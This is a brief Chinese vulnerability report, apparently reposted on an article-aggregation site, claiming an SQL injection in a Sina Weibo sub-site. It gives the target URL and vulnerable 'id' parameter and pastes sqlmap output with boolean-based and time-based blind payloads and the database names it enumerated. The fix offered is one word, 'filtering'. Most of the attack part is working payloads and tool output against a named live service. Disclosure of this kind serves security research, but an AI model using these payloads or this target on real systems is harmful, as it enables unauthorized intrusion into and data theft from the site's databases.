新浪微博某分站SQL注入一枚
程序员文章站
2022-04-22 11:11:43
rt
漏洞地址: https://v6.bang.weibo.com/xmt/matrix?id=21000037&from=prov&from_id=31...
rt
漏洞地址: https://v6.bang.weibo.com/xmt/matrix?id=21000037&from=prov&from_id=31
id参数存在注入
sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=21000040 AND 2081=2081&period=day&date=20160329&from=class&from_id=332 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: id=21000040 AND (SELECT * FROM (SELECT(SLEEP(5)))NBaZ)&period=day&date=20160329&from=class&from_id=332 --- [02:13:34] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL 5.0.12 [02:13:34] [INFO] fetching database names [02:13:34] [INFO] fetching number of databases [02:13:34] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval [02:13:34] [INFO] retrieved: [02:13:36] [WARNING] reflective value(s) found and filtering out 3 [02:13:45] [INFO] retrieved: information_schema [02:16:50] [INFO] retrieved: test [02:17:39] [INFO] retrieved: top available databases [3]: [*] information_schema [*] test [*] top
已证明
解决方案:
过滤
下一篇: IPv6基础概念学习